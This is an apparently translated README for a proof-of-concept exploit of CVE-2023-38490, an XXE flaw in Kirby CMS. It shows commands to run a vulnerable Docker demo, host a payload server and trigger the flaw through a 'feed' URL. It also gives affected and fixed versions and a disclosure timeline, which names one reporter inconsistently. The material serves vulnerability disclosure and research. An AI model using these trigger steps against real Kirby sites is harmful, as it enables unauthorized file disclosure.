Kirby XML外部实体(XXE) - CVE-2023-38490 漏洞利用
Kirby < 3.9.6 XML外部实体
针对CVE-2023-38490 / GHSA-q386-w6fg-gmgp的漏洞利用。
漏洞利用演示
构建并运行存在漏洞的演示应用:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
提供演示payload:
注意:选择一个Docker容器可以访问的绑定地址。
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
触发漏洞利用:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
它是如何工作的,以及为什么能工作?
存在漏洞的函数位于Kirby Core中,但默认情况下Kirby Core、Kirby StarterKit或Kirby PlainKit并不使用它。这意味着默认配置下该漏洞不会影响你,但可能通过自定义开发或安装使用了受影响工具包的插件而被引入。
更多详情请阅读专门文章(EN 🇬🇧 或 FR 🇫🇷)。
参考资料
- 目标软件:Kirby
- 主页/厂商:https://getkirby.com/
- 源代码:
- 受影响版本:
- <= 3.5.8.2
- 3.6.0-3.6.6.2
- 3.7.0-3.7.5.1
- 3.8.0-3.8.4
- 3.9.0-3.9.5
- 修复版本:
- 3.5.8.3+
- 3.6.6.3+
- 3.7.5.2+
- 3.8.4.1+
- 3.9.6+
- 补丁:
- 安全公告:
时间线
- 第24周 - 2023年6月12日,周一:由Alexandre ZANNI(@noraj)发现漏洞,他是ACCEIS的渗透测试工程师。
- 第24周 - 2023年6月13日,周二:Alexandre ZANNI向厂商(Kirby)报告漏洞。
- 第24周 - 2023年6月14日,周三:Alexandre ZANNI与厂商(Kirby)共享概念验证。
- 第24周 - 2023年6月14日,周三:在getkirby.com上添加RFC 9116 security.txt。
- 第24周 - 2023年6月15日,周四:厂商(Kirby)确认漏洞。
- 第24周 - 2023年6月15日,周四:计划发布修复和补丁。
- 第26周 - 2023年6月29日,周四:由Patrick FALB(@dapatrese)在FORMER 03独立发现漏洞。
- 第28周 - 2023年7月16日,周日:创建私有GitHub安全公告。
- 第29周 - 2023年7月23日,周日:请求CVE ID。
- 第29周 - 2023年7月23日,周日:厂商(Kirby)修补漏洞。
- 第30周 - 2023年7月24日,周一:Alejandrine ZANNI获得厂商(Kirby)邀请加入私有安全公告。
- 第30周 - 2023年7月24日,周一:Alexandre ZANNI准备存在漏洞的演示Docker容器。
- 第30周 - 2023年7月24日,周一:CVE ID CVE-2023-38490注册(保留)。
- 第30周 - 2023年7月27日,周四:公开发布GitHub安全公告和补丁。
免责声明
ACCEIS不推广或鼓励任何非法活动,本仓库提供的所有内容仅用于研究、教育和威胁检测目的。